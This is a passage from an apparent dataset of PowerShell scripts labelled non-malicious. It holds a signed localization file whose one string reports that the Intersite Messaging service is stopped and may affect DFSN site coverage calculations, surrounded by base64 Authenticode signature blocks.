Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDH2 # LUMqmZdFSpGHlqhQbhYLjpuwTqAECXvID4lwofejMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAY1DA35FK2WKNp0ERDdS+Eycm/0+XbfnBA33L # 2CjvBR85EWOJ/cIIsGeK3YBbVb3ADKfybdBzgPjYm/c3ueP4ohhfSqTnBffdsmg4 # kNwT37cbmO73r8h7eCq+aLSO3SobzIeDTrM1kMh84CVmtdLBW5Vc+y2WWGnsZ6mD # 1+ULQK0SMSsitZKALfWtFxWZQ/XGWc3CdJs3cpIBdKZe/Eb8AZ2mcEXqRFsFz8nR # 0TM/g+CwjI35lVu6iLtJ/znKfR+3hgs8T4nZOc0WTmiHjxsQaZFbjNAGpO/5eaI1 # WV4NATbsfkuwEIz2D8JK3+S6M1fx2SPUnk7w3LKM+9S2JkoORqGCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBkHcBB5yEo/uQbDDdO7iQE107JBGFZXm6u # YDPDDeRefgIGZh+4i42bGBMyMDI0MDQyMzEzMTYxNC45MTdaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOjA4NDItNEJFNi1DMjlBMSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHajtXJ # WgDREbEAAQAAAdowDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNjU5WhcNMjUwMTEwMTkwNjU5WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjowODQyLTRCRTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJOQ # Bgh2tVFR1j8jQA4NDf8bcVrXSN080CNKPSQo7S57sCnPU0FKF47w2L6qHtwm4EnC # lF2cruXFp/l7PpMQg25E7X8xDmvxr8BBE6iASAPCfrTebuvAsZWcJYhy7prgCuBf # 7OidXpgsW1y8p6Vs7sD2aup/0uveYxeXlKtsPjMCplHkk0ba+HgLho0J68Kdji3D # M2K59wHy9xrtsYK+X9erbDGZ2mmX3765aS5Q7/ugDxMVgzyj80yJn6ULnknD9i4k # UQxVhqV1dc/DF6UBeuzfukkMed7trzUEZMRyla7qhvwUeQlgzCQhpZjz+zsQgpXl # PczvGd0iqr7lACwfVGog5plIzdExvt1TA8Jmef819aTKwH1IVEIwYLA6uvS8kRdA # 6RxvMcb//ulNjIuGceyykMAXEynVrLG9VvK4rfrCsGL3j30Lmidug+owrcCjQagY # mrGk1hBykXilo9YB8Qyy5Q1KhGuH65V3zFy8a0kwbKBRs8VR4HtoPYw9z1DdcJfZ # BO2dhzX3yAMipCGm6SmvmvavRsXhy805jiApDyN+s0/b7os2z8iRWGJk6M9uuT24 # 93gFV/9JLGg5YJJCJXI+yxkO/OXnZJsuGt0+zWLdHS4XIXBG17oPu5KsFfRTHREl # oR2dI6GwaaxIyDySHYOtvIydla7u4lfnfCjY/qKTAgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQUoXyNyVE9ZhOVizEUVwhNgL8PX0UwHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBALmDVdTtuI0jAEt41O2OM8CU237TGMyhrGr7FzKCEFaXxtoqk/IObQriq1ca # HVh2vyuQ24nz3TdOBv7rcs/qnPjOxnXFLyZPeaWLsNuARVmUViyVYXjXYB5DwzaW # ZgScY8GKL7yGjyWrh78WJUgh7rE1+5VD5h0/6rs9dBRqAzI9fhZz7spsjt8vnx50 # WExbBSSH7rfabHendpeqbTmW/RfcaT+GFIsT+g2ej7wRKIq/QhnsoF8mpFNPHV1q # /WK/rF/ChovkhJMDvlqtETWi97GolOSKamZC9bYgcPKfz28ed25WJy10VtQ9P5+C # /2dOfDaz1RmeOb27Kbegha0SfPcriTfORVvqPDSa3n9N7dhTY7+49I8evoad9hdZ # 8CfIOPftwt3xTX2RhMZJCVoFlabHcvfb84raFM6cz5EYk+x1aVEiXtgK6R0xn1wj # MXHf0AWlSjqRkzvSnRKzFsZwEl74VahlKVhI+Ci9RT9+6Gc0xWzJ7zQIUFE3Jiix # 5+7KL8ArHfBY9UFLz4snboJ7Qip3IADbkU4ZL0iQ8j8Ixra7aSYfToUefmct3dM6 # 9ff4Eeh2Kh9NsKiiph589Ap/xS1jESlrfjL/g/ZboaS5d9a2fA598mubDvLD5x5P # P37700vm/Y+PIhmp2fTvuS2sndeZBmyTqcUNHRNmCk+njV3nMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjowODQyLTRCRTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAQqIfIYljHUbNoY0/ # wjhXRn/sSA2ggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOnSH4QwIhgPMjAyNDA0MjMxOTUyMzZaGA8yMDI0MDQy # NDE5NTIzNlowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6dIfhAIBADAHAgEAAgIU # 6jAHAgEAAgIRVDAKAgUA6dNxBAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # ACaiRtshc9G8WfVMjQ9xgEYZNyoQzv72BU6LutxlZM2r2C6LuYvcx7q63PWs3Mxk # StXHAb2esRYvBMPDXsgq+NN6fYXSMTKwpnHYRiK/t3Uv3SwtPXjykiR2mqVxj6/P # kN2nsimpupdSo/lnOZCfy706cQscQBC5MafJvRllTUbaMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHajtXJWgDREbEAAQAA # AdowDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQgdP6IUdA+k5Pq9/SDm4J5AIkEMr6sPkrmfj0NASWJ # 1SUwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCAipaNpYsDvnqTe95Dj1C09 # 020I5ljibrW/ndICOxg9xjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB2o7VyVoA0RGxAAEAAAHaMCIEIFb/iamaUnR+fesQaHni5azX # dqy22buGhS1oKaTDDm+JMA0GCSqGSIb3DQEBCwUABIICACpZeeiCIuGsnphepq+1 # gV7/GnbJx+OmJHdDR4uo+Cpfjy0TWUd48EoVu45oOKn7HlHgx+NzF+30m4vRhreG # NkGVoVkkQ/Bj1qD8YtWu/g5A6ZUYURa0Iaqo9hf0i7ouU211yLo6hFfUaTgxrDdh # AW0cLGD2hONmswUZfcHc8P9jD1Lwt0o9F8qT3LWJvQGqWJFK/Xr5Bf771Hp+uRIw # OrpxTiixhItYAOl7NDo7Ut22aiSohr20nuPcvi/Mg9Hya5/IrrfxcIShapT2nl2o # dPIVI0SY5bX9WkI7oJ8kD0h/9mkgPTDRjsnFEHeFAilbwQvbNBku8oyPc/ig+HID # EmedXPUGpeODQkmWnzKu45fNxIMEhk1J71QjK8KtjmajQCSkXa6AvrSdDN4JPIz9 # VykYEUvw/bXq36y3KReDBf5AqBh0xbL6Qb3xCzEZvimSkffdKzxlpbXNrgMuO+Mq # /vGJChB7WVY0jmlZ6FshOYC75o/D+BvD8IQvvJDCsiG0lrZTa70UIgbYnCH2WthZ # c7UCD/+KMlm4FuIuq9HL3b7usGLUybPmqWMr2cV/PRrYPJos8EMTrr5EmPPBcgXw # ZGMR3KHdMvBYxUlrj7ZeTti41k5BoxKCr/BJG3+KH5ZnxyNuu1MwUYnuK1Ky4UX9 # 3nVsVmBkCBRIZtXF61JCKW+n # SIG # End signature block
combined_dataset/train/non-malicious/sample_9_79.ps1
sample_9_79.ps1
ConvertFrom-StringData @' id_intersitemessagingstatecheck_st=Intersite Messaging service is stopped or disabled and this may cause problems related to (DFSN) site coverage calculations '@ # SIG # Begin signature block # MIIoUgYJKoZIhvcNAQcCoIIoQzCCKD8CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAJi7O24WfkNNrJ # WOb7qaJXMvmtQLtN4pEF+Fm9vG5wZ6CCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHoI # /DcqZJ/eKhWuXmt7b0KLuF1rr+Y+DVIBthIe7TsPMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAlnIRm1VH9+4/idyfWUCRJMCVsNbiKtZNxam7 # guKm5dsc2UGZ2S5+S4X2n6q3trrgqvqZVO3Tvj3U4E7qvxIucYPfZs+cGwNSA0bq # EaOMELWKoIKFEv1rFVmWrX5md0T+fDMaoMijfZ1LcM0AV88EvwCK4DyZKiOwBkSG # w9Wk61uT6QoIbx01aKfSQElMOCO71PFFNEefxvNnX52VkklWm6mkMn8ubv64pA3G # ANnvhXu7Tzcn1xA2J+SRgcmQJS5viOdrJBAuDxo/hRwA8YzHGO+q36egryc5pdim # Bl5DU4x+nugTcx03Y1oZvcm1dDjJQwsHBRBPWExsdh7jGLxeQ6GCF60wghepBgor # BgEEAYI3AwMBMYIXmTCCF5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDYLSb8kjFBJ0+oXbR2uZWFSVJpDECXk7Fs # KYRd5OLkswIGZus6esmmGBMyMDI0MTAyODExNDA0MC42MzVaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjoyQTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB+R9n # jXWrpPGxAAEAAAH5MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEwOVoXDTI1MTAyMjE4MzEwOVowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # 